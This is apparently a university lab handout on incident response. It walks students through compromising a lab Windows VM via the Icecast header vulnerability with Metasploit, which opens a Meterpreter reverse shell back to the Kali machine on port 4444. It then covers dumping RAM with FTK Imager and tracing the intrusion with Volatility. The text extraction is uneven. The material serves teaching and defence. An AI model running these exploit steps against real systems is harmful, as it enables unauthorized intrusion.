Incident response with Volatility memory analysis
By Drs. Dave Eargle and Anthony Vance
Consider the following scenario: one of your company’s production servers has made an outbound connection to an IP address, which is abnormal behavior. Your task is to investigate what is going on.
Part 1: Exploit Windows via Icecast Vulnerability
First, you’ll play the role of the attacker. Compromise the Windows VM using the Icecast vulnerability in Metasploit.
Start Icecast as admin
Launch the Windows virtual machine. Log in to it as user
If you are asked to provide a reason for an unexpected shutdown, you can ignore (cancel) this dialog. It is a Windows Server logging feature.
On Windows desktop, right-click the “Icecast2 Win32” icon. Important! Select “Run as administrator.” If any warning message pops up, click “yes”.
Running as Administrator will change the permissions that are obtained when the program is exploited.
In the Icecast window that appears, click the button “Start server.”
Note: The Icecast server is configured by default to a max of 5 connections. Each time you exploit the Icecast server, the connection count will tick up by one. If you use up all connections, simply kill and restart the Icecast server.
In Kali, from a terminal, enter:
Finding and using an Icecast exploit
msf >prompt, try:
In the search output, you should see an exploit related to
exploit/windows/http/icecast_header. Use it:
use exploit/windows/http/icecast_headerNote: You can press the tab key within Metasploit to complete a module or command name you are typing. This makes entering commands in Metasploit faster. If you push the tab key twice it should show you all possible options for directory you are in.
Your msfconsole prompt should now look like this:
msf exploit(icecast_header) >
Indicating that the
icecast_headermodule is loaded.
Set the remote host to the Windows VM IP address:
set rhost 192.168.56.100
Meterpreter should already be selected as the payload. To verify, type:
Set the “local host” variable to Kali’s IP address on the infosec-net adapter. To set the local host variable, type
set lhost 192.168.56.101
lhostwas likely set for you by default – but it may be an address for an incorrect interface! Make sure this setting is correct.Note: Remember that you can easily check your IP in Unix/Linux by typing
ipfrom within Metasploit.
Note! msfconsole allows you to specify an interface name as the
lhost. The interface name for infosec-net is
virbr1. You could set this as follows:
set lhost virbr1
show optionsto see that the variable has been set.
With all options set, now it’s time to launch the exploit! Type:
run, but that’s less fun.)
You should now be presented with the
Get the process ID by typing
Part 2: Create a memory dump from the Windows VM
In this section, you’ll use a digital forensics tool, FTK Imager, to make a copy or “image” of the Windows VM RAM.
On the Windows VM, create a new folder called “Evidence.”
Right-click the folder and select “Properties.” Select the “Sharing” tab, and click “Share.” On the next pop-up Window, click “Share.” Click “Done” and “Close.”
From inside the Windows VM, open a web browser and download the FTK Imager zip file.
In Windows, extract the zip file, and run
FTK Imager.exefrom the extracted directory.
In FTK Imager, from the “File” menu, select “Capture memory.” For the destination path, select the “Evidence” folder you created. Click “Capture Memory.”
In Kali, browse to the shared “Evidence” folder by opening the “Home” folder on the desktop. In the URL bar of the file explorer window, type:
Browse to the “Evidence” folder you created on the Windows desktop. E.g., at
Log in with user
memdump.memfile created by FTK Imager to the desktop of Kali.
Part 3: Use Volatility to examine the memory dump
Open a terminal and run the command:
git clone https://github.com/volatilityfoundation/volatility3.git
Change to the
Run the command:
pip3 install -r requirements.txt
Examine the memory dump with Volatility
volatility3directory, run the following command:
python3 vol.py -f ~/Desktop/memdump.mem windows.info
This should display information about the memory dump file.
Next, in the scenario described at the top of this document, you have been alerted that this server has made an unusual outbound connection. Let’s investigate. Run the following command:
python3 vol.py -f ~/Desktop/memdump.mem windows.netscan
This outputs the status of network connections for the Windows VM at the time that the memory dump was created. This represents a snapshot of network activity at this point in time.
Look for a line that shows an
ESTABLISHEDconnection. What is the remote IP address for this connection? What is the remote port address? What is the name of the executable associated with this connection? What is the process ID (PID) for this executable?
Note that port
4444is the default outbound port for Meterpreter.
Get a list of running processes with the following command:
python3 vol.py -f ~/Desktop/memdump.mem windows.pslist
Can you locate the executable name and process ID?
Now we will use Volatility to scan the process ID for Icecast to look for hidden malicious code injected into the Icecast proces:
python3 vol.py -f ~/Desktop/memdump.mem windows.malfind --pid [the process ID you identfied] --dump
Volatility will output portions of memory associated with the Icecast PID that it believes is running malicious code.
--dumpoption will cause Volatility to write suspected malicious portions of memory to
.dmpmemory dump files.
Verify whether the
.dmpfiles contain malware by opening virustotal.com in a browser in Kali and uploading each
.dmpfile for analysis. Select
Choose fileand then
Virus Total will run the
.dmpfile through several dozen malware scanners. Do any of the scanners report that something is amiss? What do the